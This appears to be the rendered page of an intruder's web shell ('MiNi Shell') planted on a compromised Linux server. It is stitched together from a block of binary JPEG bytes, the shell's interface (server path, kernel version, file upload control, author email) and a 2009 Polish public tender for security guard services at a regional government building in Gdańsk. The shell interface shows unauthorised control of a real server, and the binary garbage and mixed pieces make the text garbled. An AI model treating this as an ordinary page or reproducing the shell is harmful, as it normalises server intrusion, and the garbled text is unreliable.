JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/284074-N-2009.html

<p class="kh_header"><b>Gdańsk: usługi ochrony obiektu i mienia w budynku Urzędu Marszałkowskiego Województwa Pomorskiego zlokalizowanym przy ul. Augustyńskiego 2 w Gdańsku</b><br>
<b>Numer ogłoszenia: 284074 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi ochrony obiektu i mienia w budynku Urzędu Marszałkowskiego Województwa Pomorskiego zlokalizowanym przy ul. Augustyńskiego 2 w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony obiektu i mienia w budynku Urzędu Marszałkowskiego Województwa Pomorskiego zlokalizowanym przy ul.Augustyńskiego 2 w Gdańsku, realizowane w formie bezpośredniej, stałej ochrony fizycznej. 
Przedmiot zamówienia obejmuje następujący zakres usług:
3.1 Wykonawca będzie wykonywał usługi ochrony obiektu i mienia w budynku  zlokalizowanym w Gdańsku, przy ul. Augustyńskiego 2, o pow. użytkowej 3.462,20m2 położonym na działce gruntu nr 237-7, wpisanym do księgi wieczystej                                     nr GD1G-00138188-0 prowadzonej przez Sąd Rejonowy Gdańsk - Północ, jego pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach. 
3.2 Ochrona fizyczna realizowana w formie bezpośredniej, stałej ochrony fizycznej powinna być przeprowadzana przez jednakowo umundurowanych  pracowników ochrony.
3.3 Usługa ochrony będzie świadczona całodobowo, w systemie zmianowym po 12 godzin, przez dwóch pracowników ochrony na każdej zmianie, do obowiązków których będą należały następujące czynności:
1) obchód budynku wykonywany przynajmniej 1 raz na każdej zmianie - godzina obchodu będzie wpisywana w książce dyżurów, o której mowa w pkt.I.5 SIWZ;
2) przeciwdziałanie kradzieżom, napadom i innym zakłóceniom spokoju;
3) przeciwdziałanie prowadzeniu handlu obnośnego;
4) sprawdzanie zabezpieczenia pomieszczeń w budynku po godzinie 16.00 (zamknięte okna, drzwi);
    5) wydawanie kluczy upoważnionym pracownikom Urzędu Marszałkowskiego,
w przypadku zaistnienia obowiązku stosowania wewnętrznej procedury dysponowania kluczami (dotyczącej ich przyjmowania i wydawania); 
6)  udzielanie informacji o lokalizacji poszczególnych departamentów;
7) egzekwowanie zakazu dotyczącego przebywania na terenie chronionego budynku osób nieupoważnionych po godzinie 16.00.
4. Wykonawca zobowiązuje się do: 
1)	znajomości numerów telefonów do ekip pogotowia technicznego, służb publicznych typu Policja, Straż Pożarna oraz Departamentu Zamówień Publicznych i Administracji (DAZ) w Urzędzie Marszałkowskim;
2)	znajomości procedur związanych z przyjmowaniem i wydawaniem kluczy;
3)	informowania Departamentu Zamówień Publicznych i Administracji o wszelkich zauważonych usterkach i nieprawidłowościach;
	4) w przypadku wystąpienia zagrożenia, kradzieży, ingerencji osób trzecich, bądź innych ważnych zdarzeń mających wpływ na stan obiektu mienia w budynku, niezwłocznego powiadomienia odpowiednich służb publicznych, np. Policji, Straży Pożarnej oraz przedstawiciela zamawiającego - Dyrektora Departamentu Zamówień Publicznych i Administracji lub osoby zastępującej. 
5. Wykonawca będzie prowadził książkę dyżurów, do której pracownik ochrony Wykonawcy będzie wpisywał wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane                        ze sprawowaniem ochrony obiektu i mienia objętej umową.
6. W terminie do piątego dnia następującego po miesiącu świadczenia usługi, Wykonawca będzie składał Zamawiającemu miesięczną książkę dyżurów, o której mowa w pkt.I.5, SIWZ, prowadzoną w poprzednim miesiącu.
7. Wykonawca nie może zlecać części bądź całości zadania podwykonawcom bez zgody Zamawiającego wyrażonej na piśmie.
8. Zamawiający zapewni pracownikom ochrony, dostęp do pomieszczenia socjalnego                        w miejscu wykonania zamówienia oraz możliwość korzystania z linii telefonicznej,                    w celach związanych z wykonywaniem przedmiotu zamówienia.
   9.  Zamawiający będzie na bieżąco przekazywać do dyspozycji pracowników ochrony aktualny  wykaz departamentów wraz z aktualnymi numerami pomieszczeń i lokalizacją.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego może ubiegać się każdy Wykonawca, który spełnia warunki określone w art. 22 ust. 1 ustawy,   a w szczególności: 

1)  posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. posiada uprawnienia do prowadzenia działalności gospodarczej, a w szczególności do prowadzenia działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 roku  o ochronie osób i mienia (t.j. Dz. U. z 2005 r.  Nr 145, poz. 1221 ze. zm.) w związku z uzyskaną Koncesją wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w niniejszym zakresie;
2)  posiada  niezbędną wiedzę i doświadczenie,  a w szczególności w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  lub wykonuje  co najmniej dwie usługi
odpowiadające swoim rodzajem, tj. ochrona obiektu i mienia realizowana                  w formie bezpośredniej, stałej ochrony fizycznej w:
a) budynku użyteczności publicznej, np. w budynku administracji rządowej              lub samorządowej, budynku: szkoły, uczelni, szpitala, opery, teatru, filharmonii, muzeum, biblioteki, galerii, 
b) budynku należącym do sektora obrony narodowej,
c) budynku banku, 
d) budynku hotelu, motelu
e) budynku sektora prywatnego o charakterze administracyjno-biurowym,
f) budynku przedsiębiorstwa produkcyjnego i-lub usługowego i-lub handlowego   o powierzchni nie mniejszej niż 3000 m2, 
    i wartością brutto (ceną), tj. nie mniejszą niż 100.000,00 PLN każda.


Dopuszcza się możliwość przedstawienia usług wykonywanych, a jeszcze                        nie zakończonych, zgodnie z  zawartą umową, przy czym wartość wykonanych już            w ramach danej umowy usług nie może być niższa, niż określona w warunku,                      tj. 100.000,00 PLN (brutto).


3)	dysponuje niezbędnym potencjałem technicznym do wykonania  zamówienia                    lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia (w przypadku kiedy                           nie dysponuje, lecz będzie dysponował niezbędnym potencjałem technicznym                    do wykonania zamówienia);
4)	dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (w przypadku kiedy nie dysponuje, lecz będzie dysponował osobami zdolnymi do wykonania zamówienia);
5)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej, tj. w zakresie świadczenia usług ochrony osób i mienia na kwotę nie mniejszą niż 300.000,00 PLN;
6)	Wykonawca nie może podlegać wykluczeniu z postępowania na podstawie                art. 24 ust. 1 i 2 ustawy.
Ocena spełnienia warunków  udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w punkcie Informacja o oswiadczeniach(...), na zasadzie kwalifikacji spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z Ofertą składa następujące dokumenty:
1) W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień złoży stosowne oświadczenie o spełnianiu niniejszego warunku udziału w postępowaniu wg wzoru na  załączniku nr 2 do SIWZ oraz: 
a) aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie                        do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert potwierdzające uprawnienia do wykonywania działalności lub czynności w zakresie objętym zamówieniem;
b) koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji                          na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz. U.              z 2005 r.  Nr 145, poz. 1221 ze. zm.);
2) W celu potwierdzenia, że Wykonawca posiada  niezbędną wiedzę i doświadczenie,                            a w szczególności, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje, co najmniej dwie usługi
odpowiadające swoim rodzajem, tj. ochrona obiektu i mienia realizowana                  w formie bezpośredniej, stałej ochrony fizycznej w:
a) budynku użyteczności publicznej, np. w budynku administracji rządowej              lub samorządowej, budynku: szkoły, uczelni, szpitala, opery, teatru, filharmonii, muzeum, biblioteki, galerii, 
b) budynku należącym do sektora obrony narodowej,
c) budynku banku, 
d) budynku hotelu, motelu
e) budynku sektora prywatnego o charakterze administracyjno-biurowym,
f) budynku przedsiębiorstwa produkcyjnego i/lub usługowego i/lub handlowego
o powierzchni nie mniejszej niż 3000 m2, 
i wartością brutto (ceną), tj. nie mniejszą niż 100.000,00 PLN każda ,
złoży stosowne oświadczenie o spełnianiu niniejszego warunku udziału                             w postępowaniu wg wzoru na załączniku nr 2 do SIWZ oraz wykaz wykonanych                                  lub wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług ochrony obiektu i mienia w budynku, w zakresie wskazanym powyżej, z podaniem ich wartości, przedmiotu, dat wykonania oraz odbiorców, wg wzoru na załączniku nr 3 do SIWZ wraz z dokumentami potwierdzającymi, że wskazane usługi zostały wykonane należycie (np. referencjami).
Dopuszcza się możliwość przedstawienia usług wykonywanych, a jeszcze                        nie zakończonych, zgodnie z  zawartą umową, przy czym wartość wykonanych już            w ramach danej umowy usług nie może być niższa, niż określona w warunku,                      tj. 100.000,00PLN (brutto);

3) W celu  potwierdzenia, że Wykonawca dysponuje niezbędnym potencjałem technicznym do wykonania  zamówienia  lub  przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia (w przypadku kiedy nie dysponuje, lecz będzie dysponował niezbędnym potencjałem technicznym do wykonania zamówienia) złoży stosowne oświadczenie               o spełnianiu niniejszego warunku udziału w postępowaniu wg wzoru na  załączniku nr 2 do SIWZ, a w przypadku kiedy nie dysponuje, lecz będzie dysponował niezbędnym potencjałem technicznym złoży również pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia;

4) W celu potwierdzenia, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów                             do udostępnienia osób zdolnych do wykonania zamówienia (w przypadku kiedy                  nie dysponuje, lecz będzie dysponował osobami zdolnymi do wykonania zamówienia) złoży stosowne oświadczenie o spełnianiu niniejszego warunku udziału                             w postępowaniu wg wzoru na  załączniku nr 2 do SIWZ, a w przypadku kiedy nie dysponuje, lecz będzie dysponował niezbędnym osobami zdolnymi do wykonania zamówienia złoży również pisemne zobowiązanie innych podmiotów                                   do udostępnienia osób zdolnych do wykonania zamówienia ,

5) W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej                    i finansowej zapewniającej wykonanie zamówienia, a w szczególności że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej tj. w zakresie świadczenia usług ochrony osób i mienia na kwotę                 nie mniejszą niż 300.000,00 PLN złoży stosowne oświadczenie o spełnianiu niniejszego warunku udziału w postępowaniu wg wzoru na  załączniku nr 2 do SIWZ oraz aktualną polisę a w przypadku jej braku inny aktualny dokument potwierdzający,  że Wykonawca jest ubezpieczony w przedmiotowym zakresie.
W przypadku upływu terminu ważności ubezpieczenia w trakcie realizacji umowy, wykonawca przedstawi zamawiającemu, na 14 dni przed wygaśnięciem ubezpieczenia nową polisę, obejmującą okres pozostały do zakończenia trwania umowy.
6) W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu                                z postępowania na podstawie art. 24 ust. 1 i 2 ustawy złoży stosowne oświadczenie                o spełnianiu niniejszego warunku udziału w postępowaniu wg wzoru na  załączniku nr 2  do SIWZ.
	
1.2. W przypadku oferty wspólnej:
a)	w odniesieniu do wymagań dotyczących udokumentowania, że Wykonawca                    nie podlega wykluczeniu na podstawie art. 24 ust 1 i 2 oraz spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz warunki szczególne określone w punkcie Warunki udziału- przewidziane oświadczenia i dokumenty wymienione            w punkcie Infirmacja o oświadczeniach (...) 1.1. winni złożyć wszyscy przedsiębiorcy chyba, że poniższe zapisy ppkt b) i c) stanowią inaczej;
b)	w przypadku warunku wymaganej wiedzy i doświadczenia każdy                                          z przedsiębiorców musi udokumentować wiedzę i doświadczenie w wykonaniu prac-usług powierzonych mu do wykonania;
c)	w odniesieniu do warunku posiadania niezbędnej wiedzy i doświadczenia, dysponowania potencjałem  technicznym, dysponowania osobami zdolnymi                      do wykonania zamówienia, znajdowania się w sytuacji finansowej i ekonomicznej przedsiębiorcy w sumie muszą spełniać wymagane warunki.
2.  Dokumenty sporządzone w języku obcym będą składane wraz z tłumaczeniem                        na język polski, poświadczonym przez wykonawcę.
3.  Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu będą składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
4.  Dokumenty składane przez wykonawców zagranicznych.
     Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa                                w punkcie Informacja o oświadczeniach 1.1. ppkt 1)a), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
5.  Dokument, o którym mowa w punkcie Informacja o oświadczeniach (...) 4 , powinien być wystawiony                         nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę            lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie Informacja o oświadczeniach (...) 4 Z, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.                           Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy punktu Informacja o oświadczeniach (...) 5 ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.woj-pomorskie.pl/pl/bip/umwp w zakładce: zamówienia publiczne i ogłoszenia.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, ul. Okopowa 21/27 pokój 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 09:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku, ul. Okopowa 21/27 pokój 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com